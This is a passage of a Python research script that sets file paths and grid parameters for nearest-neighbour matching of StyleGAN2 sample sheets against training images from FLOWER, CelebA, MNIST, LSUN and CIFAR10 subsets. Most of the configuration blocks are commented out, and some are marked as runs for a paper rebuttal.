src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub1000_resume/00000-stylegan2-FLOWER_128_sub1000-1gpu-config-f/fakes003248.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub1000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000_resume/fakes003248/NNmatchDist.txt'
"""
"""
# for rebuttal:
#### for FLOWER_128_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub1000/00000-stylegan2-FLOWER_128_sub1000-1gpu-config-f/fakes001684.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub1000/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub1000/fakes001684/NNmatchDist.txt'
"""
"""
#### for FLOWER_128_sub4000: 4000 images dataset (resume)
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub4000_resume/00000-stylegan2-FLOWER_128_sub4000-1gpu-config-f/fakes003248.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub4000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000_resume/fakes003248/NNmatchDist.txt'
"""
"""
# for rebuttal:
#### for FLOWER_128_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_128_sub4000/00000-stylegan2-FLOWER_128_sub4000-1gpu-config-f/fakes001925.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_128_sub4000/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_128_sub4000/fakes001925/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub200: 200 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub200/00000-stylegan2-CelebA_128_sub200-1gpu-config-f/fakes007700.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub200/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub200/fakes007700/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub600: 600 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub600/00000-stylegan2-CelebA_128_sub600-1gpu-config-f/fakes005414.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub600/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub600/fakes005414/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub1000/00000-stylegan2-CelebA_128_sub1000-1gpu-config-f/fakes004933.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub1000/jpg/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub1000/fakes004933/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub4000/00000-stylegan2-CelebA_128_sub4000-1gpu-config-f/fakes003369.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub4000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub4000/fakes003369/NNmatchDist.txt'
"""
"""
#### for CelebA_128_sub8000: 8000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CelebA_128_sub8000/00000-stylegan2-CelebA_128_sub8000-1gpu-config-f/fakes001684.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CelebA_128_sub8000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CelebA_128_sub8000/fakes001684/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub10000: 10000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub10000/00002-stylegan2-MNIST_128_sub10000-1gpu-config-f/fakes005173.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub10000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000/fakes005173/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub10000: 10000 images dataset, bi:
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub10000/00002-stylegan2-MNIST_128_sub10000-1gpu-config-f/fakes005173.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub10000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub10000_3ch/fakes005173/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub30000: 30000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub30000/00000-stylegan2-MNIST_128_sub30000-1gpu-config-f/fakes005053.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub30000/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000/fakes005053/NNmatchDist.txt'
"""
"""
#### for MNIST_128_sub30000: 30000 images dataset, bi:
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_sub30000/00000-stylegan2-MNIST_128_sub30000-1gpu-config-f/fakes005053.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/MNIST_128_sub30000_bi/' # these images are generated from tfrecords using code mycode_loadImgFromTFrecords.py
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_sub30000_bi/fakes005053/NNmatchDist.txt'
"""
"""
#### for MNIST_128_train: 60000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_MNIST_128_train/00000-stylegan2-MNIST_128_train-1gpu-config-f/fakes003609.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/data/MNIST/resized/train/train_60000/' # these images are just the whole MNIST resized training set
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/MNIST_128_train/fakes003609/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub10000: 10000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub10000/00000-stylegan2-LSUN_128_sub10000-1gpu-config-f/fakes004812.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub10000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub10000/fakes004812/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub30000: 30000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub30000/00020-stylegan2-LSUN_128_sub30000-1gpu-config-f/fakes004692.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub30000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub30000/fakes004692/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub60000: 60000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub60000/00000-stylegan2-LSUN_128_sub60000-1gpu-config-f/fakes006497.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub60000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub60000/fakes006497/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub1000_resume: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub1000_resume/00000-stylegan2-LSUN_128_sub1000-1gpu-config-f/fakes002165.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub1000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub1000_resume/fakes002165/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub5000_resume: 5000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub5000_resume/00000-stylegan2-LSUN_128_sub5000-1gpu-config-f/fakes000000.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub5000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub5000_resume/fakes000000/NNmatchDist.txt'
"""
"""
#### for LSUN_128_sub200: 200 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_LSUN_128_sub200/00000-stylegan2-LSUN_128_sub200-1gpu-config-f/fakes006497.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/LSUN_128_sub200/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/LSUN_128_sub200/fakes006497/NNmatchDist.txt'
"""
"""
# parameters:
im_size = 128
# note: the sample sheet is a 32x32 grid:
num_row = 32
num_col = 32
"""
### for rebuttal: CIFAR10:
"""
#### for CIFAR10_32_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub1000/00000-stylegan2-CIFAR10_32_sub1000-1gpu-config-f/fakes002813.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub1000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub1000/fakes002813/NNmatchDist.txt'
"""
"""
#### for CIFAR10_32_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub4000/00000-stylegan2-CIFAR10_32_sub4000-1gpu-config-f/fakes003014.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub4000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub4000/fakes003014/NNmatchDist.txt'
"""
"""
#### for CIFAR10_32_sub8000: 8000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub8000/00000-stylegan2-CIFAR10_32_sub8000-1gpu-config-f/fakes003014.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub8000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub8000/fakes003014/NNmatchDist.txt'
"""
"""
#### for CIFAR10_32_sub10000: 10000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_CIFAR10_32_sub10000/00000-stylegan2-CIFAR10_32_sub10000-1gpu-config-f/fakes002009.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/CIFAR10_32_sub10000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/CIFAR10_32_sub10000/fakes002009/NNmatchDist.txt'
"""
"""
# parameters: for CIFAR10:
im_size = 32
# note: the sample sheet is of 32x32:
num_row = 32
num_col = 32
"""
### for rebuttal: image size 256x256:
"""
#### for FLOWER_256_sub1000: 1000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256_sub1000/00002-stylegan2-FLOWER_256_sub1000-1gpu-config-f/fakes004435.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256_sub1000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub1000/fakes004435/NNmatchDist.txt'
"""
"""
#### for FLOWER_256_sub4000: 4000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256_sub4000/00002-stylegan2-FLOWER_256_sub4000-1gpu-config-f/fakes006128.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256_sub4000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub4000/fakes006128/NNmatchDist.txt'
"""
"""
#### for FLOWER_256_sub6000: 6000 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256_sub6000/00002-stylegan2-FLOWER_256_sub6000-1gpu-config-f/fakes006290.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256_sub6000/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/view_sampleSheetImgs/'
dstRootDir_NNmatchResult = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/NNmatchResult/'
dstImgName_NNmatchSheet = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/NNmatchResultSheet.png'
dstTxtName_matchDist = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256_sub6000/fakes006290/NNmatchDist.txt'
"""
#"""
#### for FLOWER_256: 8189 images dataset
src_sampleSheetImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/results/results_FLOWER_256/00002-stylegan2-FLOWER_256-1gpu-config-f/fakes006209.png'
srcRootDir_originDataImg = '/eecf/cbcsl/data100b/Chenqi/stylegan2/datasets_images/FLOWER_256/jpg/'
dstRootDir_viewSampleSheetImgs = '/eecf/cbcsl/data100b/Chenqi/stylegan2/imgs/NN_query/FLOWER_256/fakes006209/view_sampleSheetImgs/'
